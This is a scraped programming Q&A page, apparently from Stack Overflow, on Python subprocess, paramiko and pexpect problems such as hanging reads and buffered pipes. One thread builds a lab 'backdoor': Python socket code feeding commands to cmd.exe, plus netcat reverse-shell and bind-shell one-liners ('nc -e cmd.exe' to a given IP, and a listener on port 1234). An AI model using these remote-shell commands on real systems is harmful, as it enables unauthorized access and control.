readline hangs on paramiko.Channel when reading "watch" command output - python

I am testing this code to read the output of watch command. I suspect it has to do with how watch works, but I can't figure out what's wrong or how to work around it:
import paramiko
host = "micro"
# timeout = 2 # Succeeds
timeout = 3 # Hangs!
command = 'ls / && watch -n2 \'touch "f$(date).txt"\''
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(host, password='', look_for_keys=False)
transport = ssh_client.get_transport()
channel = transport.open_session()
channel.get_pty()
channel.settimeout(timeout)
channel.set_combine_stderr(True)
stdout = channel.makefile()
channel.exec_command(command)
for line in stdout: # Hangs here
print(line.strip())
There are several similar issues, some of them quite old (1, 2, and probably others)
This does not happen with other commands that don't use watch either.
Does someone know what's special about this particular command and / or how to reliably set a timeout for the read operation?
(Tested on Python 3.4.2 and paramiko 1.15.1)
Edit 1: I incorporated channel.set_combine_stderr(True) as suggested in this answer to a related question, but still didn't do the trick. However, watch does produce a lot of output, so perhaps the problem is exactly that. In fact, using this command removed the hanging:
command = 'ls / && watch -n2 \'touch "f$(date).txt"\' > /dev/null'
So, probably this question is almost a duplicate of Paramiko ssh die/hang with big output, but makes me wonder if there's really no way to use .readline() (called through __next__ in this case) and one has to resort to read with a fixed buffer size and assemble the lines manually.

This probably hangs because watch does not produce newlines. If one replaces
for line in stdout:
print(line.strip())
with a busy loop with
stdout.readline(some_fixed_size)
it can be seen that the bytes never contain a newline character. Therefore, this is a very special case and is not related to other hangs reported in other issues and SO questions.

Related

Running multiple Bash commands interactively from Python

I have just come across pexpect and have been figuring out how to use it to automate various practices I would otherwise have to fill in manually in a command shell.
Here's an example script:
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files")
child.expect('#')
child.sendline('ls')
child.expect('#')
child.sendline('git add .')
child.expect('#')
child.sendline('git commit')
child.expect('#')
child.sendline('git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.expect(pexpect.EOF)
(I know these particular tasks do not necessarily require pexpect, just trying to understand its best practices.)
Now, the above works. It cds to my local repo folder, lists the files there, stages my commits, and pushes to Github with authentication, all the while providing real-time output to the Python stdout. But I have two areas I'd like to improve:
Firstly, .expect('#') between every line I would run in Bash (that doesn't require interactivity) is a little tedious. (And I'm not sure whether / why it always seems to work, whatever was the output in stdout - although so far it does.) Ideally I could just clump them into one multiline string and dispense with all those expects. Isn't there a more natural way to automate parts of the script that could be e.g., a multiline string with Bash commands separated by ';' or '&&' or '||'?
Secondly, if you run a script like the above you'll see it times out after 60 seconds sharp, then yields a TimeoutError in Python. Although - assuming the job fits within 60 seconds - it gets done, I would prefer something which (1) doesn't take unnecessarily long, (2) doesn't risk cutting off a >60 second process midway, (3) doesn't end the whole thing giving me an error in Python. Can we instead have it come to a natural end, i.e., when the shell processes are finished, that's when it stops running in Python too? (If (2) and (3) can be addressed, I could probably just set an enormous timeout value - not sure if there is better practice though.)
What's the best way of rewriting the code above? I grouped these two issues in one question because my guess is there is a generally better way of using pexpect, which could solve both problems (and probably others I don't even know I have yet!), and in general I'd invite being shown the best way of doing this kind of task.
You don't need to wait for # between each command. You can just send all the commands and ignore the shell prompts. The shell buffers all the inputs.
You only need to wait for the username and password prompts, and then the final # after the last command.
You also need to send an exit command at the end, otherwise you won't get EOF.
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files")
child.sendline('ls')
child.sendline('git add .')
child.sendline('git commit')
child.sendline('git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.sendline('exit')
child.expect(pexpect.EOF)
If you're running into the 60 second timeout, you can use timeout=None to disable this. See pexpect timeout with large block of data from child
You could also combine multiple commands in a single line:
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files && ls && git add . && git commit && git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.sendline('exit')
child.expect(pexpect.EOF)
Using && between the commands ensures that it stops if any of them fails.
In general I wouldn't recommend using pexpect for this at all. Make a shell script that does everything you want, and run the script with a single subprocess.Popen() call.

Paramiko exec command failure based on time

I have been searching and fooling around with this problem for 2 days now. Firstly, some context in the form of (summarised) code.
def setService(self, ...
ssh_client = self.conn.get_ssh_client(hostname, username=username, password=password)
setCommand = str('service ' + service_name + ' ' + status)
stdin, stdout, stderr = ssh_client.exec_command(setCommand)
# time.sleep(2)
return ...
Secondly. The whole codeset uses the same code, and everything works except for this "service foobar stop" and "service foobar start" command. It causes a Read Error (in ssh/auth.log) and does not actually effect the command. All other commands using this setup works fine (we do about 10 different commands). It happens on all target machines, from both dev machines, so I am ruling out ssh configs.
But, if I add any time delaying code after the exec_command(in the comment position), it works. A sleep(2), or a loop doing some debug printing, makes it work fine. Read Errors disappear from the auth.log and service start/stop as they should. Removing the sleep, or whatever it may be, breaks it again.
We "hack" fixed it by leaving a sleep in there, but I do not understand completely why it happens, or why stalling in the function fixes it.
Are we returning too quickly, before the exec was finished on the remote side? I do not think so, it seems to be blocking (returning into stdin, stderr, stdout).
Any advice on this would be highly appreciated.
Note: exec_command(command) is non-blocking..
I usually try to read the output from the buffer(which consumes some time - before returning), or I use a time.sleep which you've used in this case.
If you use(should) stdout.read()/readlines(), it forces your script to return the output in the stdout buffer, and in turn wait for exec_command to finish.

python subprocess stdin.write a string error 22 invalid argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Python - capture Popen stdout AND display on console?

I want to capture stdout from a long-ish running process started via subprocess.Popen(...) so I'm using stdout=PIPE as an arg.
However, because it's a long running process I also want to send the output to the console (as if I hadn't piped it) to give the user of the script an idea that it's still working.
Is this at all possible?
Cheers.
The buffering your long-running sub-process is probably performing will make your console output jerky and very bad UX. I suggest you consider instead using pexpect (or, on Windows, wexpect) to defeat such buffering and get smooth, regular output from the sub-process. For example (on just about any unix-y system, after installing pexpect):
>>> import pexpect
>>> child = pexpect.spawn('/bin/bash -c "echo ba; sleep 1; echo bu"', logfile=sys.stdout); x=child.expect(pexpect.EOF); child.close()
ba
bu
>>> child.before
'ba\r\nbu\r\n'
The ba and bu will come with the proper timing (about a second between them). Note the output is not subject to normal terminal processing, so the carriage returns are left in there -- you'll need to post-process the string yourself (just a simple .replace!-) if you need \n as end-of-line markers (the lack of processing is important just in case the sub-process is writing binary data to its stdout -- this ensures all the data's left intact!-).
S. Lott's comment points to Getting realtime output using subprocess and Real-time intercepting of stdout from another process in Python
I'm curious that Alex's answer here is different from his answer 1085071.
My simple little experiments with the answers in the two other referenced questions has given good results...
I went and looked at wexpect as per Alex's answer above, but I have to say reading the comments in the code I was not left a very good feeling about using it.
I guess the meta-question here is when will pexpect/wexpect be one of the Included Batteries?
Can you simply print it as you read it from the pipe?
Inspired by pty.openpty() suggestion somewhere above, tested on python2.6, linux. Publishing since it took a while to make this working properly, w/o buffering...
def call_and_peek_output(cmd, shell=False):
import pty, subprocess
master, slave = pty.openpty()
p = subprocess.Popen(cmd, shell=shell, stdin=None, stdout=slave, close_fds=True)
os.close(slave)
line = ""
while True:
try:
ch = os.read(master, 1)
except OSError:
# We get this exception when the spawn process closes all references to the
# pty descriptor which we passed him to use for stdout
# (typically when it and its childs exit)
break
line += ch
sys.stdout.write(ch)
if ch == '\n':
yield line
line = ""
if line:
yield line
ret = p.wait()
if ret:
raise subprocess.CalledProcessError(ret, cmd)
for l in call_and_peek_output("ls /", shell=True):
pass
Alternatively, you can pipe your process into tee and capture only one of the streams.
Something along the lines of sh -c 'process interesting stuff' | tee /dev/stderr.
Of course, this only works on Unix-like systems.

Python: cannot read / write in another commandline application by using subprocess module

I am using Python 3.0 in Windows and trying to automate the testing of a commandline application. The user can type commands in Application Under Test and it returns the output as 2 XML packets. One is a packet and the other one is an packet. By analyzing these packets I can verifyt he result. I ahev the code as below
p = subprocess.Popen(SomeCmdAppl, stdout=subprocess.PIPE,
shell = True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
p.stdin.write((command + '\r\n').encode())
time.sleep(2.5)
testresult = p.stdout.readline()
testresult = testresult.decode()
print(testresult)
I cannot ge any output back. It get stuck in place where I try to read the output by using readline(). I tried read() and it get stuck too
When I run the commandline application manually and type the command I get the output back correctly as tow xml packets as below
Sent: <PivotNetMessage>
<MessageId>16f8addf-d366-4031-b3d3-5593efb9f7dd</MessageId>
<ConversationId>373323be-31dd-4858-a7f9-37d97e36eb36</ConversationId>
<SageId>4e1e7c04-4cea-49b2-8af1-64d0f348e621</SagaId>
<SourcePath>C:\Python30\PyNTEST</SourcePath>
<Command>echo</Command>
<Content>Hello</Content>
<Time>7/4/2009 11:16:41 PM</Time>
<ErrorCode>0</ErrorCode>
<ErrorInfo></ErrorInfo>
</PivotNetMessagSent>
Recv: <PivotNetMessage>
<MessageId>16f8addf-d366-4031-b3d3-5593efb9f7dd</MessageId>
<ConversationId>373323be-31dd-4858-a7f9-37d97e36eb36</ConversationId>
<SageId>4e1e7c04-4cea-49b2-8af1-64d0f348e621</SagaId>
<SourcePath>C:\PivotNet\Endpoints\Pipeline\Pipeline_2.0.0.202</SourcePath>
<Command>echo</Command>
<Content>Hello</Content>
<Time>7/4/2009 11:16:41 PM</Time>
<ErrorCode>0</ErrorCode>
<ErrorInfo></ErrorInfo>
</PivotNetMessage>
But when I use the communicate() as below I get the Sent packet and never get the Recv: packet. Why am I missing the recv packet? The communicate(0 is supposed to bring everything from stdout. rt?
p = subprocess.Popen(SomeCmdAppl, stdout=subprocess.PIPE,
shell = True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
p.stdin.write((command + '\r\n').encode())
time.sleep(2.5)
result = p.communicate()[0]
print(result)
Can anybody help me with a sample code that should work? I don't know if it is needed to read and write in separate threads. Please help me. I need to do repeated read/write. Is there any advanced level module in python i can use. I think Pexpect module doesn't work in Windows
This is a popular problem, e.g. see:
Interact with a Windows console application via Python
How do I get 'real-time' information back from a subprocess.Popen in python (2.5)
how do I read everything currently in a subprocess.stdout pipe and then return?
(Actually, you should have seen these during creation of your question...?!).
I have two things of interest:
p.stdin.write((command + '\r\n').encode()) is also buffered so your child process might not even have seen its input. You can try flushing this pipe.
In one of the other questions one suggested doing a stdout.read() on the child instead of readline(), with a suitable amount of characters to read. You might want to experiment with this.
Post your results.
Try sending your input using communicate instead of using write:
result = p.communicate((command + '\r\n').encode())[0]
Have you considered using pexpect instead of subprocess? It handles the details which are probably preventing your code from working (like flushing buffers, etc). It may not be available for Py3k yet, but it works well in 2.x.
See: http://pexpect.sourceforge.net/pexpect.html

Categories

Resources